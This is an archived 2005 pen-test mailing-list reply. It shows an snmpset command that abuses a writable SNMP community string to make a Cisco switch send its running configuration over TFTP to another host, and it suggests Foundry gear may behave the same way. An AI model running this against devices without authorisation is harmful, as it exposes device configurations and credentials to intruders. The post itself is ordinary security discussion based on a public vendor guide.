Re: Foundry Routers and Switches

From: Frank Bussink (frank_bussink_at_hotmail.com)
Date: 10/27/05

  • Next message: Marco Monicelli: "Re: Backdoor:Win32/Hackdef.E" 
    To: pen-test@lists.securityfocus.com
Date: Thu, 27 Oct 2005 06:00:37 +0000

    Hi,

    In the case of Cisco this worksso maybe also the same mechanism for
    Foundry

    Start the TFTP server,
    Send a snmpwrtie command to ask the router to upload the running config by

    tftp.

    in the below example :

    private is the snmp writable community,
    sx-b11-9x4 is the cisco switch
    170.237.51.152 is the Ip address of the TFTP server
    sa-b11-9x3-config is the filename of the uploaded file.

    snmpset -v 1 -c private sx-b11-9x4
    .1.3.6.1.4.1.9.9.96.1.1.1.1.3.234 i 4
    .1.3.6.1.4.1.9.9.96.1.1.1.1.4.234 i 1
    .1.3.6.1.4.1.9.9.96.1.1.1.1.2.67 i 1
    .1.3.6.1.4.1.9.9.96.1.1.1.1.5.67 a 170.237.51.152
    .1.3.6.1.4.1.9.9.96.1.1.1.1.6.67 s "sx-b11-9x4-config"
    .1.3.6.1.4.1.9.9.96.1.1.1.1.14.67 i 4

    The snmp binary files can be found at http://www.net-snmp.org/ (also for
    Win32)

    The tftp program can be found on the Cisco web site.

    Original article at
    http://www.cisco.com/warp/public/477/SNMP/copy_configs_snmp.shtml

    Hope this helps
    Frank

    _________________________________________________________________
    Express yourself instantly with MSN Messenger! Download today it's FREE!
    http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/

    ------------------------------------------------------------------------------
    Audit your website security with Acunetix Web Vulnerability Scanner:

    Hackers are concentrating their efforts on attacking applications on your
    website. Up to 75% of cyber attacks are launched on shopping carts, forms,
    login pages, dynamic content etc. Firewalls, SSL and locked-down servers are
    futile against web application hacking. Check your website for vulnerabilities
    to SQL injection, Cross site scripting and other web attacks before hackers do!
    Download Trial at:

    http://www.securityfocus.com/sponsor/pen-test_050831
    -------------------------------------------------------------------------------

  • Next message: Marco Monicelli: "Re: Backdoor:Win32/Hackdef.E"

    Relevant Pages

    • Fail to Convert Aironet 1242 from lightweight mode back to autonomous mode
      ... Step 1 The static IP address of the PC on which your TFTP server ... that I use is TFTPD32 which is recommended by Cisco. ... Step 2 The PC contains the access point image file (such as c1200-k9w7- ... Initializing ethernet port 0 ...
      (comp.dcom.sys.cisco)
    • Re: Cisco Aironet 1200 Access point
      ... software but I cant get the Ion software to upgrade, ... ping IP address of TFTP server to ensure it is reachable ... The cisco documents are quite easy to follow once you get started. ... What document are you reading and where are you stuck? ...
      (comp.dcom.sys.cisco)
    • Re: Cisco Aironet 1200 Access point
      ... software but I cant get the Ion software to upgrade, ... ping IP address of TFTP server to ensure it is reachable ... The cisco documents are quite easy to follow once you get started. ... What document are you reading and where are you stuck? ...
      (comp.dcom.sys.cisco)
    • Re: Catalyst 3750 ISO update?
      ... The Cisco TFTP Server has been discontinued and is no longer supported ... You may want to investigate the FREE SolarWinds TFTP Server: ... Brad Reese ...
      (comp.dcom.sys.cisco)
    • Re: copy config file
      ... Log into the switch through the console port or a Telnet ... Upload the switch configuration to the TFTP server with the ... Uploading a Configuration File to a TFTP Server: ...
      (comp.dcom.sys.cisco)